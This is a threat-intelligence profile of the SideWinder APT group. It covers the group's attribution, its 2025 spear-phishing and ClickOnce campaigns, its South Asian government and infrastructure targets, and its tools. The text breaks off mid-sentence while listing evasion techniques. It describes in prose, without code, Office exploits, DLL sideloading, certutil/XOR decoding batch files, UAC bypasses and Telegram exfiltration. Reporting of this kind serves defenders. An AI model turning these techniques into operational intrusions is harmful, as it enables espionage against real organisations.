SideWinder is a sophisticated advanced persistent threat (APT) group, active since at least 2012, widely attributed to Indian state-sponsored actors due to its focus on regional rivals and geopolitical lures tied to India-Pakistan tensions. The group specializes in cyber espionage, targeting sensitive data theft from government, military, and critical infrastructure sectors. Known aliases include Rattlesnake and T-APT-10, SideWinder employs modular malware toolkits, legacy vulnerability exploits, and evolving delivery mechanisms like ClickOnce applications. By late 2025, the group has intensified campaigns against South Asian entities, incorporating server-side polymorphism and sector-specific targeting in maritime, logistics, and nuclear domains, while maintaining low detection through obfuscation and legitimate software abuse.
Key Activities
SideWinder’s operations emphasize multi-stage intrusions with tailored spear-phishing, often leveraging current events for relevance. Notable 2025 campaigns include:
• May 2025 Public Sector Attacks: Spear-phishing with malicious Word and RTF documents exploiting CVE-2017-0199 and CVE-2017-11882 for remote code execution, leading to multistage loaders, shellcode payloads, and DLL sideloading for persistent access and data exfiltration.
• March–September 2025 ClickOnce Campaign: Four waves of phishing emails with fake PDFs and Word docs (e.g., lures on “India-Pakistan Conflict” or ministry credentials) prompting “Adobe Reader updates” via buttons, downloading signed ClickOnce apps that sideload malicious DLLs and deploy .NET-based stealers.
• Ongoing 2025 Sector Expansions: Systematic targeting of critical infrastructure with updated toolsets, including credential hooking, browser token theft, and Telegram-based exfiltration; campaigns feature geofenced payloads and dynamic C2 paths for evasion.
• Broader Patterns: Use of batch scripts for payload orchestration, artifact cleanup, and UAC bypasses; integration of Python stealers for file collection and WMI for system reconnaissance.
These activities reflect a shift toward broader infrastructure risks, with no confirmed disruptions by November 2025.
Targets
SideWinder’s espionage efforts are geopolitically driven, prioritizing intelligence on regional adversaries:
• Core Focus: High-level government institutions in Pakistan (e.g., Ministry of Defense), Bangladesh (e.g., foreign affairs), and Sri Lanka (e.g., Central Bank, Army battalions, ministries of finance and foreign affairs).
• Expanded Scope (2025): Maritime and logistics firms, nuclear power facilities in South Asia; diplomatic entities like European embassies in New Delhi; occasional hits on financial and military sectors across Asia, Africa, and Europe. Victims are selected for strategic value, with lures mimicking official correspondence to high-profile officials.
Tools and Tactics
The group favors a mix of custom implants, modified open-source tools, and abuse of legitimate binaries for stealth:
• Initial Access: Spear-phishing attachments (RTF/DOCX with Office exploits) or links to credential phishers mimicking services like Zimbra; PDF buttons for ClickOnce downloads.
• Execution/Persistence: Windows scripting (cmd.exe, PowerShell, mshta.exe, VBScript) for shellcode injection; scheduled tasks (every 2–10 minutes) and autostart folders; batch files (e.g., a.bat for decoding via certutil/XOR).
• Defense Evasion: DLL sideloading (e.g., ReaderConfiguration.exe with DEVOBJ.dll), UPX packing, XOR obfuscation (key “N